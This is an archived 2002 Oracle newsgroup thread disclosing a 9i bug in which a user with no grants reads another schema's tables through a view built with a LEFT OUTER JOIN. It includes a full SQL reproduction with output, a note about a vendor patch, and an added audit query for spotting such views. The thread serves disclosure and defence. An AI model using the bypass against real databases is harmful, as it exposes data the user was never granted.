
Re: 9iDB Security Hole?

From: Vladimir M. Zakharychev <bob_at_dpsp-yes.com>
Date: Thu, 18 Apr 2002 11:24:04 +0400
Message-ID: <a9ls7j$fri$1@babylon.agtel.net>


A one-off patch for bug 2121935 (ARU:1600347) was put out for 9.0.1.3/Solaris yesterday. Can anyone with 9.0.1.3/Sol install it and verify that it closes the hole altogether?

--
Vladimir Zakharychev (bob@dpsp-yes.com)                http://www.dpsp-yes.com
Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
All opinions are mine and do not necessarily go in line with those of my employer.


"Vladimir M. Zakharychev" <bob_at_dpsp-yes.com> wrote in message news:a9et5g$9sa$1_at_babylon.agtel.net...

> Anyone with 9i can confirm this?
>
> From: news [mailto:news_at_host.talk.ru] On Behalf Of ...
> ...relcom.comp.dbms.oracle
>
>
> connect system/****@database
> CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> Grant Create Session To us1;
> Grant Create Session To us2;
> Grant Create Table To us1;
> grant unlimited tablespace to us1;
> Grant Create View To us2;
>
> Connect us1/us11@database;
> Create Table t1(c1 Number(1));
> Insert Into t1(c1) Values(9);
> Create Table t2(c1 Number(1));
> Insert Into t2(c1) Values(9);
>
> commit;
> Connect us2/us12@database;
>
> SQL> Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- this is expected
> SQL> Select * From us1.t2;
> ORA-00942: table or view does not exist
> -- this one too
> SQL> Create View aa As Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- and this one
> SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
> From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
>
> View created
> -- now this one is NOT !!!!!
> SQL> select * from aa;
>
> T1_C1 T2_C1
> ---- ----
> 9 9
>
>
> This effectively means that LEFT OUTER JOIN allows creating views
> on tables that are normally not visible (provided that the unprivileged user
> knows the table and column names).
> If you can confirm this basic example, can you also try it on system
> catalog tables/views? If you cannot confirm, please specify your version
> and platform so that we know which ones are not affected (the poster didn't
> specify a version, but I suggest it's 9.0.1.1 on either NT or Linux).
>
> --
> Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> All opinions are mine and do not necessarily go in line with those of my employer.
>
>
>
Received on Thu Apr 18 2002 - 02:24:04 CDT
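Until the one-off patch is applied, a DBA will want to know whether any view like `us2.aa` above already exists, that is, a view whose owner holds no privilege on a table it reads. The audit query below is an added example written for this page, not something from the thread or from Oracle; it uses only the standard DBA_DEPENDENCIES, DBA_TAB_PRIVS, DBA_SYS_PRIVS and DBA_ROLE_PRIVS dictionary views and must be run by a user who can read them. It treats a direct SELECT (or, on later releases, READ) grant to the owner or to PUBLIC, or a SELECT ANY TABLE system privilege held directly or through one level of role, as legitimate; anything else is reported.

```sql
-- Audit query (added example, not from the thread): list views that reference
-- a table in another schema for which the view owner holds no visible privilege.
-- A view created through the LEFT OUTER JOIN hole described above shows up here,
-- because the owner (us2) was never granted anything on us1.t1 / us1.t2.
SELECT d.owner            AS view_owner,
       d.name             AS view_name,
       d.referenced_owner AS table_owner,
       d.referenced_name  AS table_name
  FROM dba_dependencies d
 WHERE d.type            = 'VIEW'
   AND d.referenced_type IN ('TABLE', 'VIEW')
   AND d.referenced_owner <> d.owner              -- cross-schema references only
   AND d.owner NOT IN ('SYS', 'SYSTEM')           -- skip the dictionary owners
   -- no direct object grant to the view owner, and none to PUBLIC
   AND NOT EXISTS (SELECT 1
                     FROM dba_tab_privs p
                    WHERE p.owner      = d.referenced_owner
                      AND p.table_name = d.referenced_name
                      AND p.grantee   IN (d.owner, 'PUBLIC')
                      AND p.privilege IN ('SELECT', 'READ'))  -- READ exists from 12c on
   -- no SELECT ANY TABLE held directly or via a directly granted role (one level)
   AND NOT EXISTS (SELECT 1
                     FROM dba_sys_privs s
                    WHERE s.privilege = 'SELECT ANY TABLE'
                      AND (s.grantee = d.owner
                           OR s.grantee IN (SELECT r.granted_role
                                              FROM dba_role_privs r
                                             WHERE r.grantee = d.owner)))
 ORDER BY 1, 2, 3, 4;
```

Run against the scenario in the quoted post, the query returns two rows, `US2 AA US1 T1` and `US2 AA US1 T2`, since us2 was granted only CREATE SESSION and CREATE VIEW. Nested role grants deeper than one level are not followed, so an owner who reaches SELECT ANY TABLE through a chain of roles appears as a false positive; each reported row should still be checked by hand before the view is dropped, and the finding should be cross-checked with the one-off patch status of the instance.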
